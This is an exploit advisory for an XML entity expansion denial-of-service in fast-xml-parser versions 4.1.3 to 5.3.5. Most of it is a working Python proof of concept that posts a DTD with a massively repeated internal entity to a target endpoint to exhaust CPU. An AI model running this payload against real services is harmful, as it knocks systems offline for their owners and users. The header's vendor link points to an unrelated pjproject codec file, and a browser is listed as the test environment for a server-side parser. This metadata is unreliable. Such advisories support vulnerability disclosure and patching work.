=============================================================================================================================================
| # Title     : XML Entity Expansion Denial‑of‑Service (DoS) via Malicious DTD Injection                                                     |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor    : https://github.com/pjsip/pjproject/blob/master/pjmedia/include/pjmedia-codec/h264_packetizer.h                              |
=============================================================================================================================================

[+] Summary    : A Denial-of-Service (DoS) vulnerability was identified in fast-xml-parser affecting versions 4.1.3 through 5.3.5.
                 The issue arises from improper handling of XML Document Type Definitions (DTD), specifically when processing internal entity expansion. 
                 An attacker can supply a crafted XML payload containing recursively or massively referenced internal entities. 
				 Even with a very small input size, the parser may be forced to perform excessive entity expansion.
				 
[+] Affected Versions

4.1.3 through 5.3.5

[+] Fixed Version

5.3.6
				 
[+] POC   :  

import requests
import time

TARGET_URL = "http://localhost:3000/parse-xml" # Replace with your target endpoint

def generate_malicious_xml():
    """
    Generates a malicious XML payload that bypasses nested entity checks
    but contains a massive amount of raw text for expansion.
    """
    large_data = "A" * 50000 
    references = "&dos;" * 1000
    
    xml_payload = f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE exploit [
  <!ENTITY dos "{large_data}">
]>
<root>
    <trigger>{references}</trigger>
</root>
"""
    return xml_payload

def launch_exploit(url):
    """
    Sends the payload and measures the server's response time.
    """
    payload = generate_malicious_xml()
    
    print(f"[*] Malicious payload generated (Upload size: {len(payload) / 1024:.2f} KB)")
    print(f"[*] Sending exploit to: {url}...")
    
    start_time = time.time()
    
    try:

        response = requests.post(
            url, 
            data=payload, 
            headers={'Content-Type': 'application/xml'}, 
            timeout=10
        )
        print(f"[!] Server responded with status: {response.status_code}")
        print("[?] Exploit might have failed or the server is protected.")
        
    except requests.exceptions.Timeout:
        duration = time.time() - start_time
        print(f"[+] Exploit Successful! Server did not respond for {duration:.2f} seconds.")
        print("[!] The Parser is now busy processing, consuming 100% CPU.")
        
    except requests.exceptions.ConnectionError:
        print("[!] Connection failed: The server might have crashed or the service is down.")
    except Exception as e:
        print(f"[-] An unexpected error occurred: {e}")

if __name__ == "__main__":

    launch_exploit(TARGET_URL)
	
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================